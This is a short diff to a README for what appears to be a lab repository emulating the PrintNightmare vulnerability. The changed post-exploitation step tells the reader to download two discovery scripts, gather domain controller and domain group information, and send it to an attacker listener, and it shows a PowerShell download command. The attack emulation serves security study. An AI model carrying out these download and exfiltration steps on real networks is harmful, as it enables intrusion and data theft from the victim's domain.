gdrlab/PrintNightmare/README.md

 # Guides to emulate the vulnerability
 Post-exploitation
-Download 2 scripts to discovery local machine and domain group info, then send them back to attacker listener.
+Download 2 scripts to discover victim DC machine and domain group info, then send them back to attacker listener.

 ```powershell
 PS Invoke-WebRequest -Uri path/to/discovery.bat -o discovery.bat